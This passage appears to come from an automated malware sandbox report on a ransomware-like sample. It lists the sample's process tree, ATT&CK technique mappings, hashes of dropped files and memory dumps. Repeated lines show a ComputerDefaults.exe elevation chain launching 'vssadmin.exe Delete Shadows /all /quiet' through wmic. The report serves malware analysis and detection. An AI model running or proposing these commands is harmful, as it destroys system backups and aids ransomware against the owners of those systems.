    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4816

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:5408
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:6120
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5768

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5416

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5424

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5432

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5972

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
1⤵
PID:3232

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3452

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:300

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6080

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6088

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5604

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5580

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5384

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3760
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5732
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5872

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3324

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1760
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5812
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3664

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3664

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5560
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4016
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5864

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3812
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5404
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5800

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5580
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3608
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5680

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5376

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:308
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:764
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4744

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3308

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5276
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5896
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3856

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1492
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5672
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:764

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5372
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4684
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1484

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5584
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4540

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5144
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:308
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5388

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5748

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1576

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5900

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:220

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2652

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4824
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4124

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5536

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6104

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5112

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6116

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5496
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3128
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3336

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2468
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3176
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5736

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4440

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1480
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5308

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5920

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5376
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:464
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2692

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1704
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:764
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6116

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5776

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5896

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:2104

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5720

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1732
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:6092
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5632
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5768

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4904
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5980
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5636

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5772

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4404

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1136

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4848
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2560
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:220

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4156
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4676
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6100

C:\Windows\system32\BackgroundTaskHost.exe
"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
1⤵
PID:5724

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4524

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5892
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:1116

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3772
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3128
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4824

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4688
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:1600

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:6008
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3580
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5124

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2668

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Interacts with shadow copies
PID:5416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\aeb5bca2-43b6-4782-a2f9-ba0b4c36e43d.dmp

Filesize
1.9MB

MD5
8bb2196eee085ab9d6a84e20758da01f

SHA1
a0650a682c268c945bce2ec4d779a9422865b947

SHA256
6359303e549401cb83065ae6a52e0dc7c76d9cfd76d24eb4d9908cb10735de37

SHA512
db802b72ebfb1efb338b3a74e18f2d518b3ea1260c355c1e66c8ff74a532e44c55eec9f397f99e7f0ee655893a3d00f4664777e64d4286725663a86f66ddf92a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
1004a376c8300a93fcd7f9a11abf3d1a

SHA1
db74aa786d2bc4444fee4abed29f21e05220f1fd

SHA256
85cb26132ee638874bb9efe9d9761da4c2800960a0ce6f12e103b4be486c30a7

SHA512
8976388c0fc661180eb89637eb43ac7cd4bded7994e11cec886ffad0aa57599b42932e774fc204eeee557cf59142511fdeb3b42a95fc9ce60a3056ecbc7ab380

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
312B

MD5
2f399011b01b2d61ce6c845922f37b2e

SHA1
6650edd11c869d105fae9815cc46f40923612d0f

SHA256
7ec9ef128bd0a213396f8bbe98ec73d744cee9444858904cc97a3f9d94799c05

SHA512
56b1541fed0308fbe5152c7d149d3e5c1ec5daeeb2cdfee73366e7bf10c0993065c1e762db2b3cdf383faa754fa99314a0daa78c6644cd961d68f83ec70631a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
e1acba25e664db4f5b29a4f53d733a42

SHA1
3372c405dc21ae7e061e947176041b3414b52818

SHA256
40b699f4d64261b9802580be4e723fed50af6e081a6453e2eabbf9c58eb29012

SHA512
a9cbb29a0f4543b350951df9bdd3f06bbf9df4871692f87b4e84862e85d5b72305efba0ee886914de6b05075910f2906d75f78ade715240bc70e970a1e31f206

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
dc95845b2007a751edc7d1a587cc4c89

SHA1
4c352d64e1584476e7c0892e174dd9aee70d6675

SHA256
267746eb4b97cee54a2416a53123403dfc9941c4c954d9419f095691a06e0010

SHA512
4b0791a3529e15f1f007bf35c55f00bd26bd25a91b60065bd88f7e4aa42fb46737dfcc0e62c80df63827aa303dac8a13b61b6257cca6e0e49fbdab0a9f1d5791

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

Filesize
523B

MD5
6fbee129f4858c6dcb5bb9852929fbe2

SHA1
93e0bf2a5b76dc565e8c4e7615acd93df8669177

SHA256
a00fbae701af094e25372ac4edeb8617719df8039738f82eee2147836cc1d77b

SHA512
49ea9998db69ef857fc3e45eb31a742a8f4dbae1e5ed68c4980b1431e2cc5669ffc84f73408dd809c0d554a7ce859dbc1efbf918bc7a4a58fccee1d1bbc13704

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

Filesize
690B

MD5
10e3e5a45a4824d42147cb6988ef0aff

SHA1
fed8c72cb25616efd749aa23e1a7eab370895381

SHA256
4a6e48d7e65a87ecb77426a1207363b18e06883cae07ce97aaa2d7c1f13b9b93

SHA512
ca5422d872204f069d19e7a53da69f5b48f37e425ca84afb956ad1af9896513f2ec1ed65b35a72b18bfc437be14d683a9e214d1fb74ca5fd63d3d62a1cfb989d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

Filesize
690B

MD5
16984c3dff669aa504f11683304152b2

SHA1
15c05b89da4a9b856a26b1965aeca2b6b8388bbb

SHA256
8585d530f1b2f5e7b129883455eab8a4c54415f008be3b9974e19cf611c0d002

SHA512
85f4c14fd315731766ba568f101ba84981ddd29d52ceb2920b6989478c3c3e1b67a01ea429ab6c4a433a07736e7b549399325b536887974d703ca22c2dbdbd11

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
4366e975648ad0d2753c043abb90860a

SHA1
177652654d7231458e13bb726c86ea61f7367b19

SHA256
46b66ebfea859767076836a887973b4cef7834b1fc2dd4ff088662346445e05b

SHA512
7a15d03079cbc47b5f46de0efd41f83186fc95d1ff8bc56b228f7deb3cd77817699be698cb2932344971faf2ddb252c070fffac5e2c32cd030fbb0865d4304e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
37KB

MD5
ca59ef5c3a7642e69c7049b550f068ec

SHA1
29f825e30f4e37292a92a3b6ad7b3cebff58e82a

SHA256
29c3017cd90f7477d8f6ab36c38504f9e11b6385a0f8747889252bf5c729f08e

SHA512
b71cc8fa184806a6cea018a6f6a72afc29043151433c3c1c150d2e402615dae35d039d7654a7c0f4742865a6e1e68d1b56890f0d98a7566698f83c33a3dd26c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
42KB

MD5
463722b0747b73c6faf75460dbfa4b9f

SHA1
a5fcb089ad7333dbf2fb32d8833f0275208b4240

SHA256
cfd87105fe4aa415db6de83920e9f3576031ea1c6cb8d137b0a491aa198012c2

SHA512
18b4588c3066e92718c1b2074f57127d22e8d46d23bff4045e5a2cb9da3e1250636f5e16b1570e2543ee28c1e024f0e25caf0c889863f6d188b441cfa4205713

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
42KB

MD5
2d556ed55e9b982cc86fe386c8786cc6

SHA1
88fd3739d072d3664291d4df8f2ea88d03d6a756

SHA256
56be354d3091a1335ae2f03766ec36ce541d2ac95e7d276f82e2ca253e4a8f04

SHA512
a799bd4b26855fc62c5e26c19498c44f974e62d9f233fc7e1572532c7d612c1e05317270c90d903278b6cc45aa0241cc68fe1c147bd74c566a40cf26b43ceb6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Filesize
9B

MD5
b6f7a6b03164d4bf8e3531a5cf721d30

SHA1
a2134120d4712c7c629cdceef9de6d6e48ca13fa

SHA256
3d6f3f8f1456d7ce78dd9dfa8187318b38e731a658e513f561ee178766e74d39

SHA512
4b473f45a5d45d420483ea1d9e93047794884f26781bbfe5370a554d260e80ad462e7eeb74d16025774935c3a80cbb2fd1293941ee3d7b64045b791b365f2b63

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\1710125761

Filesize
2KB

MD5
3efc546645e836de3b9d365dbc1bf027

SHA1
ba979281fca748b17a14668f72935b5a3fe0e4ce

SHA256
430e1e72678242e49c85269e51306e8d3d262487cff1311406d1cc85e9d3c45c

SHA512
4e8b4b5ba8d19662e3bb248ebe29d441f7f0e1bcd3a75a902483dec3ee0b1ab7f8fdc53c76b6eef906ce2057abc6e8aa02115027ad34a17d84abf7bbb4d74a8f

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\1710125761

Filesize
4KB

MD5
cc8e356e8bca04748931921c4d6f0e1f

SHA1
aec2738c595f63ebfd1d9c6a138dde010e06b24c

SHA256
871e5cf74f3a6880c8464bfcf81fceb932545b60e0c781896bf5e2db85e63ab4

SHA512
1abbe2982eea20bfe9e662848c257d2be0c011d4a08870670a3c4ba64b734056a62f472bf5e108a2a611be8fb7e6cd43f8adcfbf7f31cc66c539c17d81b370e6

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\eventbeacons.dat

Filesize
213B

MD5
3a1d4d355a8d2cc662a4b7a191c45a16

SHA1
de6d9b337e3904fefccd8039b53b998ce0e8bc1f

SHA256
b8e393828e85d4eadfadcb045270489d348b1d7fd5ba6711c53991323bcf9a76

SHA512
04c37e13d1469718ff765528b9eb8e14275563546e35b5cfb8f628551756ac25958d941bc6873f635635441107d1cec171817b1613d9c810988cfc561c6ef1dd

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\eventbeacons.dat

Filesize
629B

MD5
e401da0fda06a7d027ed84047afa56f1

SHA1
feb1f2ccb58dc32199eb2778c19535031f8b731b

SHA256
f33c29febed0c4faeeb1ed8b4babb90bbedbf85268ce8f56a492f5eaa868879a

SHA512
548017cf267fa4ff6dfb9cc8dea9b28abae2c06fca714e206baefec4f1a73f3cdd7a35b6f995b688ac23c3906c8647a89b1ff4590cb2500f4b0a110352bcc6a9

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\eventbeacons.dat

Filesize
416B

MD5
8e6cda87f64e8071fefb9a43d825903e

SHA1
9881f33ce7a15a9e408b17a52e6dc5c29523b5b9

SHA256
757f18d7a9119a51987e2bbbabc49b397189bf1b3ba97764a35c5907ba0040bb

SHA512
364217552e8699f79d34d2c7e7310774bf58087f51cd5dc9c02ae96599a7b1f2f2d69b41178461a6c40f7e70781a5942f5e9ec3fb5b0bf63b8a4e2fd60782ceb

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\310091\0c9bf3e4bd9445a6a0a96cd587dbec13_1

Filesize
1KB

MD5
4765dd6c32ec7b9b17e92db21b2809ad

SHA1
03a9806bd2f54c42043808567ebccf380e8f01e4

SHA256
846adfbea636cede83b84b91da5c47525c57059e2fd92fccdc2a0093b3749f22

SHA512
41a32a431653522448a007f68e0a833aa3cfd470245235237ec05c2268f060ad2d8dd4f37f254d653b97fa372ffe7f093c3dba6a260aa9e4c32cb1268a7c6950

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338388\7e605185edaa40bb819a0f332998ad7a_1

Filesize
2KB

MD5
acb9045ab796bb58c71e9644b010e324

SHA1
04ac8218e15b07c197b30b180b952c56ba489dc5

SHA256
57c81e71e100734bb1eb9d4b99a4b041ff4775da68dfd69fa4064e62a9940284

SHA512
7a70a11f2d656c58b956ce574c8cee0b40ca45d406effbf337a9211b306ea404585aabc7ba665b254536b07dd0725b891a0a7e8ceb8ebab5bfa36e646b740c5e

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338388\7e605185edaa40bb819a0f332998ad7a_2

Filesize
2KB

MD5
aab1f77d93fc784139ff66f8a79821cb

SHA1
08b02dbadf1c6385808a7c5996df6713b9de3834

SHA256
6e13c13b8be70dbc53d68b4387577c0996ee6922bb9a183dd194faf9fc536002

SHA512
e9ed6f624922b27336c284818372562611b938f395dee2df35e0ee2adf1e1a7767c32f04983049afdd3848699742b50ad9ef99c3721adfc8fb904ee12771471a

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

Filesize
22KB

MD5
5de71bf58f9fc90927ba96dacb9d4f11

SHA1
dd763b7d9a792ebc47d9c8706533dd52ef3ad6db

SHA256
6002855cb4a987599308ec0a2330f7d1fc796791cde885dd595dff66988c6c5e

SHA512
5b338c1913e790fd040e0bb223ab7fb6a2ebea5c8077cd67fb36bf79d1647ae429aca267b0c45dc5b30afe3ad66c5b5a8c563d1b90a38a224a335370c59676a7

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
8a9d27073d83574e1d4e2c435b5c36b1

SHA1
dd0fd660f6605abe93ce5ee281dfbd237bce92e8

SHA256
fdd7e969bb8e9761b3550717e62a8eedca267d391c0ea0053054b6780362e13c

SHA512
4b1de9a269fb82b74ecd4f680720512d6f1a40bd61d20b5a81d24c7c91946d1f637f334cf4dde47a0a47062e6476fc0a1869d77d3c5c1b362c7a10c7b7304a75

Download Submit
C:\Users\Public\readme.txt

Filesize
332B

MD5
718777534403cdcf89b5d9b5f4b2f141

SHA1
3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29

SHA256
619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb

SHA512
8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

Download Submit
memory/376-13-0x0000026AA43D0000-0x0000026AA43D1000-memory.dmp

Filesize
4KB

Download
memory/376-8-0x0000026AA3B10000-0x0000026AA3B11000-memory.dmp

Filesize
4KB

Download
memory/376-18-0x0000026AA44C0000-0x0000026AA44C1000-memory.dmp

Filesize
4KB

Download
memory/376-16-0x0000026AA4400000-0x0000026AA4401000-memory.dmp

Filesize
4KB

Download
memory/376-14-0x0000026AA43E0000-0x0000026AA43E1000-memory.dmp

Filesize
4KB

Download
memory/376-10-0x0000026AA4380000-0x0000026AA4381000-memory.dmp

Filesize
4KB

Download
memory/376-1-0x0000026AA3B30000-0x0000026AA4372000-memory.dmp

Filesize
8.3MB

Download
memory/376-2-0x0000026AA3AD0000-0x0000026AA3AD1000-memory.dmp

Filesize
4KB

Download
memory/376-5-0x0000026AA3AF0000-0x0000026AA3AF1000-memory.dmp

Filesize
4KB

Download
memory/376-7-0x0000026AA3B00000-0x0000026AA3B01000-memory.dmp

Filesize
4KB

Download
memory/376-11-0x0000026AA4390000-0x0000026AA4391000-memory.dmp

Filesize
4KB

Download
memory/376-4-0x0000026AA3AE0000-0x0000026AA3AE1000-memory.dmp

Filesize
4KB

Download
memory/2396-0-0x00000252882C0000-0x00000252882C5000-memory.dmp

Filesize
20KB

Download
